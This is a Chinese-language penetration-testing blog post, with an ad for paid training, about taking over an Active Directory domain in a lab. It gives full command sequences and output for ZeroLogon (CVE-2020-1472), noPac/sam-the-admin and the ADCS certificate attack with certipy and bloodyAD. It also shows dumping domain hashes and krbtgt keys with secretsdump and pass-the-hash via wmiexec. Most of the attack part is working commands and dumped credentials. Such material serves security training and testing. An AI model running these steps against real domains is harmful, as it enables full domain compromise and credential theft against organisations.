Active Directory 域权限提升的几种方法
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。
漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。
└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135
[ ] config file found: /etc/proxychains4.conf
[.4 ] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so
[4.15 ] DLL init: proxychains-ng
Performing authentication attempts...
[127.0.0.1:1088 ... 10.10.10.135:135 ... OK ] Strict chain ...
[127.0.0.1:1088 ... 10.10.10.135:49158 ... OK ] Strict chain ...
=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
python3 secretsdump.py scaner/ad$@10.10.10.135 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.secdb:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
scaner.secmoonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.secdb:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.secdb:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.secdb:des-cbc-md5:f2cd2c3bceae0dcd
scaner.secmoonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faac
scaner.secmoonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6
scaner.secmoonsec:des-cbc-md5:f1160b49cd8654e5
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb423
12SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d786
12SERVER-DB$:des-cbc-md5:97cb313b2931c7c7
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38
dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5
[*] NL$KM
0000 AA C3 E0 AC C2 DA 1C 8A E2 DB 90 CA 31 0B 7E 7A ............1.~z
0010 6F 59 D2 1E BE 59 7D 65 25 B2 88 77 DE 20 C5 B2 oY...Y}e%..w. ..
0020 92 A6 4D 30 2D 1F 40 7D 64 2D 47 3B 92 C4 04 9D ..M0-.@}d-G;....
0030 EB DE 94 64 A6 7F 7F 5C 13 61 F4 C8 6E BA 0E B5 ...d....a..n...
NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5
[*] Cleaning up...
exp地址 https://github.com/WazeHell/sam-the-admin
python sam_the_admin.py "moonsec/test:pass123" -dc-ip 10.10.10.135 -shell
详细说明 https://mp.weixin.qq.com/s/B9iZIYezRfFR6wGnAgUNXQ
详细 https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA
获取 ca
certutil -config - -ping
生成证书
certipy req 'moonsec.lab/test:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template User -debug
测试证书
certipy auth -pfx test.pfx -debug
查看ms-DS-MachineAccountQuota属性
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'DC=moonsec,DC=lab' ms-DS-MachineAccountQuota
使用bloodyAD工具来创建机器账户。
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 addComputer sec123 pass123
如果ms-DS-MachineAccountQuota>0就可以创建机器帐户
更新机器帐户的DNS Host Name
将机器帐户的DNS Host Name改为域控的ad.moonsec.lab
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 setAttribute 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName '["ad.moonsec.lab"]'
查看DNSHostName的指向
python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName
运行Certipy生成机器证书,可以看到DNS Host Name已经变成了ad.moonsec.lab
certipy req 'moonsec.lab/sec123$:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template Machine
验证证书
certipy auth -pfx ad.pfx -debug
impacket的secretsdump.py来dump哈希
python secretsdump.py 'moonsec.lab/ad$@moonsec.lab' -hashes :76e0ba3e2c8333b929064f85dcc0a824
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5213.html